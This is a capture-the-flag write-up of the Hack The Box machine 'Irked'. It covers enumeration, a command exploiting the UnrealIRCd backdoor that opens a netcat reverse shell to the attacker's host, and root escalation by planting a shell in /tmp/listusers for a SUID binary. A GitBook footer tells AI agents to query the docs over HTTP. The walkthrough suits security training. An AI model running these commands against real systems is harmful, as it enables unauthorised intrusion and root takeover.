> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-irked.md).

# HTB - Irked

## Enumeration and Foothold

### NMAP

```bash
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
6697/tcp  open     irc          UnrealIRCd
8067/tcp  open     irc          UnrealIRCd
13709/tcp filtered netbackup
34347/tcp open     status       1 (RPC #100024)
65534/tcp open     irc          UnrealIRCd

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP ( PORT 80)

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fld6tb4AryO90jOe4X8Em%2Fimage.png?alt=media&amp;token=e7d27636-54ef-42ee-b5cc-2c5b36a7cbcc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBOSJMKM3fLFSmQuWQ1WX%2Fimage.png?alt=media&amp;token=d0a4c698-a0de-4f06-88da-f237818cf4d8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLZylzRf3lo2EFCdVKXVV%2Fimage.png?alt=media&amp;token=fc4ce649-e5ff-43b6-a35b-49c52374bb23" alt=""><figcaption></figcaption></figure>

Application is running Apache Version 2.4.

nothing interesting on port 80 shifting focus to next port.

### Port 8067

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrHxJc8i7IErc0j7pDgpd%2Fimage.png?alt=media&amp;token=78a05233-f1cd-49f5-b91d-aef89a7b28be" alt=""><figcaption></figcaption></figure>

port 8067 is running UnrealIRCd.

I dont what it is but searching for vulnerabilities reveals it faces a critical backdoor RCE.

but i need the version to confirm that the vulnerability works. Accessing it directly results in ping timeout error.

```bash
┌──(ajay㉿kali)-[~]
└─$ nmap -p 6697,8067 --script=irc-unrealircd-backdoor 10.129.89.116
Starting Nmap 7.98 ( https://nmap.org ) at 2026-09-20 20:36 +0000
Nmap scan report for 10.129.89.116
Host is up (0.044s latency).

PORT     STATE SERVICE
6697/tcp open  ircs-u
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
8067/tcp open  infi-async
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Nmap done: 1 IP address (1 host up) scanned in 32.10 seconds
```

running nmap script on the ports reveals there is a possibility of vulnerable version on port 8067 but i need the exact version number to be 100 percent certain of it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSw6o1s2MhHxNlBM4owcn%2Fimage.png?alt=media&amp;token=709725aa-c5b8-4056-a16f-f34ecbcbdf0d" alt=""><figcaption></figcaption></figure>

running an aggressive scan reveals a admin email.

&#x20;googling on how to interact with the irc reveals the below commands

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FirEQJp2heWpMOzqLMeoP%2Fimage.png?alt=media&amp;token=2da55e55-4ec1-457e-8e39-790cdf912cd5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FazEpbH9uX1K1KMkokWFs%2Fimage.png?alt=media&amp;token=854f7c50-2d3f-4371-b4ea-7c1cd9c58de3" alt=""><figcaption></figcaption></figure>

that said i will use hexchat to interact with the service.

### Hexchat to interact with IRC

install the hexchat as follows

```
sudo apt update && sudo apt install hexchat -y
```

launch hexchat

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrMO56REGpTtS4AmvqCNX%2Fimage.png?alt=media&amp;token=ad0eed12-b56e-48a6-863a-f36cb90699b8" alt=""><figcaption></figcaption></figure>

When the Network List opens:

1. Click **Add** → name it `irked`  and press enter
2. Click **Edit**

**Step 2 — Click "Edit..."**

* You'll see a server edit window
* Under the **Servers** tab, you'll see a default entry like `newserver/6667`
* **Double-click** that entry and replace it with: 10.129.89.116/8067 and press enter

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FT4Tr2DD75uYjyo2ZsDou%2Fimage.png?alt=media&amp;token=6460eca4-6811-4613-80ec-5b368f95e913" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8yPuNokzPooJ4ymDG99l%2Fimage.png?alt=media&amp;token=7af2544d-66c8-4e60-81a4-9bec08fb4934" alt=""><figcaption></figcaption></figure>

**Step 3 — In the same Edit window:**

* Uncheck **"Use SSL"** if checked
* Uncheck **"Use global user information"** if you want (optional)
* Make sure nick is `ajay`
* Leave everything else default

**Step 4 — Click "Close" on the Edit window, then "Connect"**

Or back on the Network List, select `irked` from the list and click **Connect**.&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0FRV4l0r21pXiBkbYns7%2Fimage.png?alt=media&amp;token=c4137f0d-3f56-4ffb-9d4d-162046182d9a" alt=""><figcaption></figcaption></figure>

click ok.

enter this command to enumerate the version

/QUOTE VERSION

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrgWjuNXjfv8qT2DKUgNP%2Fimage.png?alt=media&amp;token=17bc5c62-582e-4ab7-9966-4a01a4f17531" alt=""><figcaption></figcaption></figure>

and the version is leaked and is vulnerable.

{% embed url="<https://www.exploit-db.com/exploits/16922>" %}

found the above poc to exploit the vulnerability where it is sending the below to exploit the  vulnerability

```
sock.put("AB;" + payload.encoded + "\n")
```

let me do the same to get reverse shell

```bash
┌──(ajay㉿kali)-[~]
└─$ echo "AB; nc -e /bin/bash 10.10.14.52 4444" | nc 10.129.89.116 8067
```

## Shell as IRCD

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBSgVEjMuAB4XK3Url782%2Fimage.png?alt=media&amp;token=c7269957-6ad0-4cb3-bf3b-751094dd4430" alt=""><figcaption></figcaption></figure>

upgrade the shell&#x20;

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ export TERM=xterm
export TERM=xterm
ircd@irked:~/Unreal3.2$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOe8wkKIO0m9oGDevRdIc%2Fimage.png?alt=media&amp;token=e16e11bb-31df-41f4-8ca1-4a8bfc4c2504" alt=""><figcaption></figcaption></figure>

need to get access as djmardov to read the user flag.

found a backup file&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvivfCSzE5lyc2JW67it6%2Fimage.png?alt=media&amp;token=4c440b46-266e-45f9-814e-256c46d5e891" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCRoBOwuefpo1UYyzhoay%2Fimage.png?alt=media&amp;token=05818120-4f84-4c2e-8358-d011c003d52c" alt=""><figcaption></figcaption></figure>

leaks a steg password.

that means it is related to a image, the only where i found image is on port 80. lets download that and investigate it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdKGC7xYbRHCseU01qmOy%2Fimage.png?alt=media&amp;token=7ad39e20-0396-47dc-9753-ffcfb6f1b600" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1qSbUNNIZHtAuOuZPp2F%2Fimage.png?alt=media&amp;token=a2470878-77fe-41e5-83c4-700ef3769427" alt=""><figcaption></figcaption></figure>

i can try this against djmardov.

## Shell as Djmardov

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRyQIToAp9mWn0jMn7md6%2Fimage.png?alt=media&amp;token=dc0e6558-308a-4390-8a32-81363f913041" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdN7gIBiXDLeDcGHoaH9E%2Fimage.png?alt=media&amp;token=7c567865-00f2-4335-a933-a9e27eb54dd3" alt=""><figcaption></figcaption></figure>

the binary `viewuser` looks interesting which has suid bit set on it.

running the binary gives the following details

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9nHuwG955XgxUtPThtmL%2Fimage.png?alt=media&amp;token=dd9ee745-2eab-4655-84a8-8f5059a9edef" alt=""><figcaption></figcaption></figure>

it is developed for setting and testing user permissions and calls a file called `listusers` in tmp directory which doesn’t exist.

what i will do here is insert a bash shell in listusers file and give it  execute privileges when run by the viewuser it runs as root.

```bash
djmardov@irked:~$ echo '/bin/bash' > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
```

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKMy8X4jkK3CtYie2MFUw%2Fimage.png?alt=media&amp;token=8fb0a954-48eb-4d42-81cb-f73c1a13399a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-irked.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
